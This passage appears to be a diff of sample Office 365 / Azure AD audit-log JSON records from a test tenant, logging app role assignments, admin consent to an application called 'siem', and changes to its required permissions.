"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "ServicePrincipal.Name", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": 
"1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", 
"Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"Name": "ServicePrincipal.ObjectID", 
"OldValue": "", "NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"NewValue": "siem", "OldValue": "", "Name": "ServicePrincipal.DisplayName"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", 
"Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9992570Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795878"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "41c7d7a7-ce53-4696-aa78-37c451a95fe1"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:05", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": 
"User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "Office 365 Management APIs"}, {"Type": 2, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2"}, {"Type": 4, "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ModifiedProperties": [{"NewValue": "5c242833-909c-4c6b-bca3-50feaaa98d23", "OldValue": "", "Name": "ServicePrincipal.ObjectID"}, {"Name": "ServicePrincipal.DisplayName", "OldValue": "", "NewValue": "siem"}, {"Name": "ServicePrincipal.AppId", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585", "OldValue": "", "Name": "ServicePrincipal.Name"}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, 
{"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "efe101d0-818a-4f19-b2f8-53186f8218ad"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com"}, {"Name": "targetName", "Value": "Office 365 Management APIs"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ServicePrincipal.ObjectID\",\"ServicePrincipal.DisplayName\",\"ServicePrincipal.AppId\",\"ServicePrincipal.Name\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalTargets", "Value": "[{\"ObjectID\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"DisplayName\":\"siem\",\"ObjectClass\":\"ServicePrincipal\",\"AppId\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"Name\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\"}]"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:05.9242333Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795815"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": 
"##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Add app role assignment to service principal.", "Id": "14f7e7eb-0fd1-4f89-bda8-642d035f3541"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", 
"ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.IsAppOnly", "OldValue": "", "NewValue": "False"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": 
"[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:06.0142481Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795893"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": "env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "821dc03c-4e38-4cd1-82b2-3155b41b4418"} -{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T18:26:06", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": 
"User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "83.57.233.151", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "83.57.233.151", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Type": 2, "ID": "ServicePrincipal"}, {"Type": 1, "ID": "siem"}, {"Type": 2, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Type": 4, "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ObjectId": "71a0194b-b70c-44a6-82f2-d4670aee4585", "ModifiedProperties": [{"Name": "ConsentContext.IsAdminConsent", "OldValue": "", "NewValue": "True"}, {"NewValue": "False", "OldValue": "", "Name": "ConsentContext.IsAppOnly"}, {"Name": "ConsentContext.OnBehalfOfAll", "OldValue": "", "NewValue": "True"}, {"Name": "ConsentContext.Tags", "OldValue": "", "NewValue": ""}, {"Name": "ConsentAction.Permissions", "OldValue": "", "NewValue": "[[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]] => [[Id: MygkXJyQa0y8o1D-qqmNI_mOUpib6JpGsZv6jnKgD6Y, ClientId: 5c242833-909c-4c6b-bca3-50feaaa98d23, PrincipalId: , ResourceId: 98528ef9-e89b-469a-b19b-fa8e72a00fa6, ConsentType: AllPrincipals, Scope: User.Read]]; "}, {"Name": "TargetId.ServicePrincipalNames", "OldValue": "", "NewValue": "71a0194b-b70c-44a6-82f2-d4670aee4585"}], "ResultStatus": "Success", "ExtendedProperties": [{"Name": "resultType", "Value": "Success"}, {"Name": "auditEventCategory", "Value": "ApplicationManagement"}, {"Name": "nCloud", "Value": ""}, {"Name": "actorContextId", "Value": 
"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "actorObjectId", "Value": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Name": "actorObjectClass", "Value": "User"}, {"Name": "actorUPN", "Value": "asr@testsiem.onmicrosoft.com"}, {"Name": "actorAppID", "Value": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Name": "actorPUID", "Value": "1003200096971F55"}, {"Name": "teamName", "Value": "MSODS."}, {"Name": "targetContextId", "Value": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd"}, {"Name": "targetObjectId", "Value": "5c242833-909c-4c6b-bca3-50feaaa98d23"}, {"Name": "extendedAuditEventCategory", "Value": "ServicePrincipal"}, {"Name": "targetSPN", "Value": "71a0194b-b70c-44a6-82f2-d4670aee4585"}, {"Name": "targetName", "Value": "siem"}, {"Name": "targetIncludedUpdatedProperties", "Value": "[\"ConsentContext.IsAdminConsent\",\"ConsentContext.IsAppOnly\",\"ConsentContext.OnBehalfOfAll\",\"ConsentContext.Tags\",\"ConsentAction.Permissions\",\"TargetId.ServicePrincipalNames\"]"}, {"Name": "correlationId", "Value": "206711cb-0722-49cc-a9ad-af7f34da9452"}, {"Name": "version", "Value": "2"}, {"Name": "additionalDetails", "Value": "{\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\"}"}, {"Name": "env_ver", "Value": "2.1"}, {"Name": "env_name", "Value": "#Ifx.AuditSchema#IfxMsods.AuditCommonEvent"}, {"Name": "env_time", "Value": "2020-02-09T18:26:06.0142481Z"}, {"Name": "env_epoch", "Value": "0871Y"}, {"Name": "env_seqNum", "Value": "46795893"}, {"Name": "env_popSample", "Value": "0"}, {"Name": "env_iKey", "Value": "ikey"}, {"Name": "env_flags", "Value": "257"}, {"Name": "env_cv", "Value": "##7d51f55f-78c7-4cb8-8046-40aecfef1c99_00000000-0000-0000-0000-000000000000_7d51f55f-78c7-4cb8-8046-40aecfef1c99"}, {"Name": "env_os", "Value": ""}, {"Name": "env_osVer", "Value": ""}, {"Name": "env_appId", "Value": "restdirectoryservice"}, {"Name": "env_appVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_ver", "Value": "1.0"}, {"Name": 
"env_cloud_name", "Value": "MSO-AM5R"}, {"Name": "env_cloud_role", "Value": "restdirectoryservice"}, {"Name": "env_cloud_roleVer", "Value": "1.0.11737.0"}, {"Name": "env_cloud_roleInstance", "Value": "AM5RRDSR530"}, {"Name": "env_cloud_environment", "Value": "PROD"}, {"Name": "env_cloud_deploymentUnit", "Value": "R5"}], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "AzureActiveDirectoryEventType": 1, "Operation": "Consent to application.", "Id": "821dc03c-4e38-4cd1-82b2-3155b41b4418"} +{"OrganizationId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "CreationTime": "2020-02-09T15:33:26", "Actor": [{"Type": 5, "ID": "asr@testsiem.onmicrosoft.com"}, {"Type": 3, "ID": "1003200096971F55"}, {"Type": 2, "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e"}, {"Type": 2, "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "755e500a-6c03-46b0-b53b-282f23374e3b"}, {"Type": 2, "ID": "User"}], "Version": 1, "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", "RecordType": 8, "ActorIpAddress": "175.16.199.1", "UserId": "asr@testsiem.onmicrosoft.com", "UserType": 0, "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", "ClientIP": "175.16.199.1", "SupportTicketId": "", "Workload": "AzureActiveDirectory", "Target": [{"Type": 2, "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "08d8bb01-c269-4a92-9929-a1a89b729512"}, {"Type": 2, "ID": "Application"}, {"Type": 1, "ID": "siem"}], "ObjectId": "Not Available", "ModifiedProperties": [{"Name": "RequiredResourceAccess", "OldValue": "[\r\n {\r\n \"ResourceAppId\": \"00000003-0000-0000-c000-000000000000\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"e1fe6dd8-ba31-4d61-89e7-88639da4683d\",\r\n \"DirectAccessGrant\": false,\r\n \"ImpersonationAccessGrants\": [\r\n 20\r\n ]\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n },\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": 
\"594c1fb6-4f81-4475-ae41-0c394909246c\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n }\r\n ],\r\n \"EncodingVersion\": 1\r\n }\r\n]", "NewValue": "[\r\n {\r\n \"ResourceAppId\": \"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\r\n \"RequiredAppPermissions\": [\r\n {\r\n \"EntitlementId\": \"4807a72c-ad38-4250-94c9-4eabfe26cd55\",\r\n \"DirectAccessGrant\": true,\r\n \"ImpersonationAccessGrants\": []\r\n },\r\n {\r\n \"EntitlementId\": \"e2cea78f-e743-4d8f-a16a-75b629a038ae\",\r\n 